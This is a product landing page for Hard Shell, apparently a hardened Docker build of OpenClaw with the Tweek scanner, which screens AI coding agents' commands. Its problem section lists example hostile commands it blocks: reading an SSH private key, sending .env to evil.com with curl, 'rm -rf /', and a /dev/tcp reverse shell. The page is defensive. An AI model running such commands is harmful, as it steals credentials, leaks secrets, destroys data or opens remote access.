How It Works Why Tweek Pricing Hard Shell Blog GitHub
Hard Shell Project - armored lobster

Hard Shell

A security-hardened Docker distribution of OpenClaw with Tweek built in.
One command to install. Zero configuration required.

$ curl -fsSL https://raw.githubusercontent.com/gettweek/hard-shell/master/install.sh | bash

Open Source · Apache 2.0 · Builds from source on your machine · No Docker Hub required

THE PROBLEM

AI Assistants Are Powerful but Risky

AI coding assistants can read your SSH keys, exfiltrate secrets, execute destructive commands, and install malicious dependencies. Hard Shell stops these attacks before they execute.

!

Credential Theft

cat ~/.ssh/id_rsa — Blocked before execution

!

Secret Exfiltration

curl evil.com -d @.env — Blocked before execution

!

Destructive Commands

rm -rf / — Blocked before execution

!

Reverse Shells

bash -i >& /dev/tcp/... — Blocked before execution

ARCHITECTURE

How It Works

Every command the AI wants to run passes through Tweek's security scanner first. Dangerous operations are blocked before they execute.

Hard Shell Container
OpenClaw
Gateway :18789
Tweek Plugin
Intercept
Scanner
Approve / Deny
1

OpenClaw Receives

Your IDE or browser sends requests to the OpenClaw gateway.

2

Tweek Intercepts

Every tool call is caught by the Tweek plugin before execution.

3

Scanner Decides

Pattern matching, sandbox execution, and LLM review approve or deny the command.

CONTAINER SECURITY

Hardened From the Ground Up

Hard Shell doesn't just scan commands — it locks down the entire container so a compromised agent can't escape.

Non-Root Execution

Runs as node (UID 1000), never root. Minimal attack surface.

Read-Only Filesystem

Container filesystem is immutable. A compromised agent cannot modify system files.

Dropped Capabilities

All Linux capabilities removed. No privilege escalation possible (no-new-privileges).

Resource Limits

Memory (2GB) and PID limits prevent resource exhaustion attacks.

Localhost Only

Gateway bound to 127.0.0.1. No external network exposure. Secure auth enforced.

Immutable Configs

Security configs are locked read-only after startup. A compromised agent cannot disable its own safety checks. No SSH installed.

PRESETS

Choose Your Security Level

Trusted

Minimal

Fingerprint-based approval with minimal scanning.

  • Fastest performance
  • Fingerprint-based approval
  • Best for CI/CD pipelines
  • Trusted environments only
DEFAULT

Cautious

Balanced

Full screening with LLM review for risky commands.

  • Pattern matching (<1ms)
  • Sandboxed execution (~50ms)
  • LLM semantic review (~200ms)
  • Best for daily development

Paranoid

Maximum

Maximum security with manual approval required.

  • All screening layers active
  • Manual approval for risky ops
  • Best for sensitive codebases
  • Full audit trail
WHICH ONE?

Hard Shell vs Tweek Standalone

Tweek is the security engine. Hard Shell is the armored vehicle with the engine already installed.

 
Hard Shell
Tweek
Install
One Docker cmd
pip install tweek
Scope
Full stack
Security only
Infra hardening
Built-in
DIY
Config mgmt
Automatic
Manual
Best for
Production
Existing setups
MANAGEMENT

Simple CLI

The installer adds hard-shell to your PATH. Manage from anywhere.

$ hard-shell status    # Check container health
$ hard-shell logs -f    # Follow live logs
$ hard-shell restart    # Restart the container
$ hard-shell preset    # View or change preset
$ hard-shell apikey    # Configure LLM API key
$ hard-shell url       # Print gateway URL
$ hard-shell update    # Pull latest + rebuild
$ hard-shell uninstall # Remove everything
Hard Shell Project

One Command. Fully Hardened.

OpenClaw + Tweek + Docker security. Built from source on your machine.
No telemetry. No cloud. Your code stays yours.

$ curl -fsSL https://raw.githubusercontent.com/gettweek/hard-shell/master/install.sh | bash
View on GitHub Tweek Standalone